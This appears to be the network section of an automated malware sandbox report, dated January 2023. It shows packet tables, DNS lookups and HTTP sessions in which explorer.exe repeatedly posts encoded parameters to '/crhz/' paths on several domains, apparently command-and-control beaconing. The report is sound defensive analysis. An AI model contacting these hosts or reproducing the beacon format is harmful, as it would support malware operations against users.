                                                                Jan 30, 2023 14:53:03.089373112 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089421988 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089454889 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.102144003 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.102201939 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.102242947 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.109050989 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.109071016 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.109162092 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.128443003 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128460884 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128479958 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128513098 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.128540993 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.390084982 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.390124083 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.390314102 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:04.042043924 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.055406094 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.346223116 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.346335888 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.346477032 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.637743950 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842413902 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842509031 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842585087 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.842778921 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:06.132190943 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:10.899293900 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.918121099 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.918365955 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.918714046 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.937977076 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944618940 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944701910 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944880009 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.960635900 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.960881948 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:12.430260897 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.446420908 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.465547085 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.465756893 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.465934992 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.485127926 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.485183954 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489326954 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489356041 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489521027 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.504614115 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.504766941 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:15.183377028 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.459997892 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.478792906 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.479120970 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.479351044 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.498285055 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.502583981 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.502609968 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.503109932 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.503109932 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.515495062 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.515577078 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.522129059 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:21.539298058 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.559437037 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.559734106 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.559890985 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.579907894 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582130909 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582182884 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582329035 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:23.072971106 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.087867975 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.107870102 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.108068943 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.108309984 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.128197908 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129245043 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129281044 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129385948 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:25.618851900 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.635763884 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.656297922 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.660391092 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.660531998 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.680896997 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.680932045 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.680949926 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.681301117 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.687810898 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.708287954 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:32.419715881 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.628928900 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.629105091 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.629285097 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.838231087 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840301037 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840337038 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840447903 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:34.135165930 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.151458025 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.352411985 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.352718115 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.352989912 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.553666115 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555524111 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555552006 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555628061 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:36.861062050 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:37.871694088 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.077023983 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.077142000 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.077323914 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.282538891 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284764051 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284797907 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284982920 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:48.845897913 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:49.051172018 CET8049743163.44.198.50192.168.2.6
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 30, 2023 14:52:04.887362003 CET | 49448 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:04.934912920 CET | 53 | 49448 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:52:15.149280071 CET | 59082 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:15.296698093 CET | 53 | 59082 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:52:25.676759005 CET | 63863 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:25.786144018 CET | 53 | 63863 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:52:37.351376057 CET | 62538 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:37.379280090 CET | 53 | 62538 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:52:48.252239943 CET | 51530 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:48.275645971 CET | 53 | 51530 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:52:59.297007084 CET | 56122 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:52:59.407166004 CET | 53 | 56122 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:53:10.874785900 CET | 61609 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:53:10.897556067 CET | 53 | 61609 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:53:21.514297009 CET | 52481 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:53:21.536995888 CET | 53 | 52481 | 8.8.8.8 | 192.168.2.6
                                                                Jan 30, 2023 14:53:31.715282917 CET | 56086 | 53 | 192.168.2.6 | 8.8.8.8
                                                                Jan 30, 2023 14:53:32.418251038 CET | 53 | 56086 | 8.8.8.8 | 192.168.2.6
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Jan 30, 2023 14:52:04.887362003 CET | 192.168.2.6 | 8.8.8.8 | 0x2b9d | Standard query (0) | www.laylaroseuk.com | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:15.149280071 CET | 192.168.2.6 | 8.8.8.8 | 0xce2 | Standard query (0) | www.n-r-eng.com | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:25.676759005 CET | 192.168.2.6 | 8.8.8.8 | 0x37fe | Standard query (0) | www.sandpiper-apts.com | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.351376057 CET | 192.168.2.6 | 8.8.8.8 | 0xa8c | Standard query (0) | www.tf8dangky.online | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:48.252239943 CET | 192.168.2.6 | 8.8.8.8 | 0xe0fc | Standard query (0) | www.teammart.online | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:59.297007084 CET | 192.168.2.6 | 8.8.8.8 | 0x25b8 | Standard query (0) | www.suachuadienlanh247.com | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:10.874785900 CET | 192.168.2.6 | 8.8.8.8 | 0x36dc | Standard query (0) | www.hvlandscapes.biz | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:21.514297009 CET | 192.168.2.6 | 8.8.8.8 | 0xee85 | Standard query (0) | www.frogair.online | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:31.715282917 CET | 192.168.2.6 | 8.8.8.8 | 0x511b | Standard query (0) | www.mitsubangsaen.online | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Jan 30, 2023 14:52:04.934912920 CET | 8.8.8.8 | 192.168.2.6 | 0x2b9d | No error (0) | www.laylaroseuk.com | laylaroseuk.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:04.934912920 CET | 8.8.8.8 | 192.168.2.6 | 0x2b9d | No error (0) | laylaroseuk.com | | 2.57.90.16 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:15.296698093 CET | 8.8.8.8 | 192.168.2.6 | 0xce2 | No error (0) | www.n-r-eng.com | | 185.151.199.52 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:25.786144018 CET | 8.8.8.8 | 192.168.2.6 | 0x37fe | No error (0) | www.sandpiper-apts.com | | 164.88.201.214 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.379280090 CET | 8.8.8.8 | 192.168.2.6 | 0xa8c | No error (0) | www.tf8dangky.online | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.379280090 CET | 8.8.8.8 | 192.168.2.6 | 0xa8c | No error (0) | dns.ladipage.com | ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.379280090 CET | 8.8.8.8 | 192.168.2.6 | 0xa8c | No error (0) | ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com | | 18.138.206.213 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.379280090 CET | 8.8.8.8 | 192.168.2.6 | 0xa8c | No error (0) | ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com | | 13.251.100.80 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:37.379280090 CET | 8.8.8.8 | 192.168.2.6 | 0xa8c | No error (0) | ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com | | 18.142.208.246 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:48.275645971 CET | 8.8.8.8 | 192.168.2.6 | 0xe0fc | No error (0) | www.teammart.online | | 184.94.215.91 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:52:59.407166004 CET | 8.8.8.8 | 192.168.2.6 | 0x25b8 | No error (0) | www.suachuadienlanh247.com | | 103.221.223.104 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:10.897556067 CET | 8.8.8.8 | 192.168.2.6 | 0x36dc | No error (0) | www.hvlandscapes.biz | hvlandscapes.biz | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:10.897556067 CET | 8.8.8.8 | 192.168.2.6 | 0x36dc | No error (0) | hvlandscapes.biz | | 76.223.105.230 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:10.897556067 CET | 8.8.8.8 | 192.168.2.6 | 0x36dc | No error (0) | hvlandscapes.biz | | 13.248.243.5 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:21.536995888 CET | 8.8.8.8 | 192.168.2.6 | 0xee85 | No error (0) | www.frogair.online | frogair.online | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:21.536995888 CET | 8.8.8.8 | 192.168.2.6 | 0xee85 | No error (0) | frogair.online | | 81.169.145.72 | A (IP address) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:32.418251038 CET | 8.8.8.8 | 192.168.2.6 | 0x511b | No error (0) | www.mitsubangsaen.online | cname.u01.df.bkk1.cloud.z.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                Jan 30, 2023 14:53:32.418251038 CET | 8.8.8.8 | 192.168.2.6 | 0x511b | No error (0) | cname.u01.df.bkk1.cloud.z.com | | 163.44.198.50 | A (IP address) | IN (0x0001) | false
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                0 | 192.168.2.6 | 49712 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:04.976145029 CET | 99 | OUT | GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1
                                                                Host: www.laylaroseuk.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:05.010261059 CET | 99 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:04 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                1 | 192.168.2.6 | 49713 | 185.151.199.52 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:15.370327950 CET | 101 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.n-r-eng.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.n-r-eng.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
                                                                Jan 30, 2023 14:52:15.456197977 CET | 101 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                10 | 192.168.2.6 | 49727 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:48.450901985 CET | 154 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.teammart.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.teammart.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Ascii: ghJ5T=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
                                                                Jan 30, 2023 14:52:48.741343975 CET | 156 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:48 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                11 | 192.168.2.6 | 49728 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:51.304053068 CET | 162 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.teammart.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.teammart.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:52:51.578947067 CET | 164 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:51 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Jan 30, 2023 14:52:51.578978062 CET165INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                Jan 30, 2023 14:52:51.578998089 CET166INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                Jan 30, 2023 14:52:51.579137087 CET168INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                Jan 30, 2023 14:52:51.579185963 CET168INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                12 | 192.168.2.6 | 49729 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:54.016726017 CET | 169 | OUT | GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:54.282556057 CET | 170 | IN | HTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:54 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                13 | 192.168.2.6 | 49730 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:52:59.707041025 CET | 176 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.suachuadienlanh247.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.suachuadienlanh247.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:00.332551956 CET | 177 | IN | HTTP/1.1 404 Not Found
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                content-type: text/html; charset=UTF-8
                                                                link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                                content-encoding: gzip
                                                                vary: Accept-Encoding
                                                                transfer-encoding: chunked
                                                                date: Mon, 30 Jan 2023 13:53:00 GMT
                                                                server: LiteSpeed
                                                                connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                14 | 192.168.2.6 | 49731 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Jan 30, 2023 14:53:02.526284933 CET | 190 | OUT | POST /crhz/ HTTP/1.1
                                                                Host: www.suachuadienlanh247.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.suachuadienlanh247.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.suachuadienlanh247.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Jan 30, 2023 14:53:03.089288950 CET | 192 | IN | HTTP/1.1 404 Not Found
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                cache-control: no-cache, must-revalidate, max-age=0
